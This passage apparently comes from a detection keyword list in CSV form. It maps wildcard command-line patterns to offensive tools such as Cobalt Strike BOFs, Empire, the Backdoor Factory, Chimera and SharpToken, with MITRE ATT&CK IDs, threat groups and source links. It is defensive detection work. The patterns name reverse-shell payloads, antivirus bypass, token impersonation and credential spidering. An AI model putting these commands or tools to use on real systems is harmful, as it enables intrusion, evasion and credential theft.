It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,0,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -* --excludedcs*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* exclusion.c /Fodefender.o*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,0,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -* -ExeArguments *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-* exec * -p * -c *,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z
-* exec * --pid * --command *,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target
computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z
-* exec-command -clear*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z
-* exec-command -command *,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z
-* exec-command -shell*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z
-* -exec-shellcode *,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,0,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z
-* execute *NT AUTHORITY\SYSTEM*cmd /c *,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks.
It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z
-* execute NT AUTHORITY\SYSTEM* cmd true bypass*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z
-* --execution false --save True --output *.bin*,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,0,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z
-* exegol.apk*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* exegol.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* exe-selfdelete*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 -
TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z
-* Exfil.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z
-* exfiltrate.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z
-* exiting (due to fatal error)*,greyware_tool_keyword,dns,Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z
-* Exrop(*/bin/*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,0,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z
-* extract --secrets --zsh*,offensive_tool_keyword,PassDetective,PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets,T1059 - T1059.004 - T1552 - T1552.001,TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/aydinnyunus/PassDetective,1,0,N/A,7,1,51,3,2023-08-16T16:51:15Z,2023-07-22T12:31:57Z
-* --extra-verbose*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* -f *.bin -e AMSI*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z
-* -f *.bin -e Defender*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z
-* -f *.dmp windows.cmdline*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.dlllist --pid *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.filescan*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559
- ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.handles --pid *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.info*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.malfind*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.netscan*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.netstat*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 -
?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.pslist*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.psscan*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.pstree*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.registry.hivelist*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.registry.hivescan*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.registry.printkey*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.dmp windows.registry.printkey*Software\Microsoft\Windows\CurrentVersion*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* -f *.exe --encrypt xor --jmp -o *.exe*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,0,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z
-* -f *.exe -m onionduke -b *.dll*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z
-* -f *.exe -m onionduke -b *.exe*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z
-* -f *.ps1 -l 3 -o *.ps1
-v -t powershell*reverse*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z
-* -f Find-AllVulns*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z
-* -f Find-PathDLLHijack*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z
-* -f Get-DomainGroupMember* -a *-Identity *admin* -Recurse*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z
-* -f Invoke-Inveigh*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z
-* -f kirbi *,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation
Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z
-* -f passw -e xlsx csv *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z
-* -f passw user admin account network login logon cred *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z
-* -f psexec.exe -H * -P * -s reverse_shell_tcp*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z
-* -f shells/generic1.ps1 *,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z
-* -f tcpview.exe -s iat_reverse_tcp_inline -H * -P * -m automatic -C*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z
-* -f
TeamViewer.exe -H * -P * -s *,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z
-* -FakeCmdLine *,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,0,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z
-* -FakeCmdLine *,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB.
The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z
-* -FakeDC * -SamAccountName * -Username *,offensive_tool_keyword,AD exploitation cheat sheet,DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* fcrdns.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* --file ownedusers.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* --file-smuggler-port *,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands.
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z
-* filetransfer -download -src-file *.exe*/tmp*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z
-* filetransfer -upload -src-file *.exe*\temp*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z
-* FileZillaPwd*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS.
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
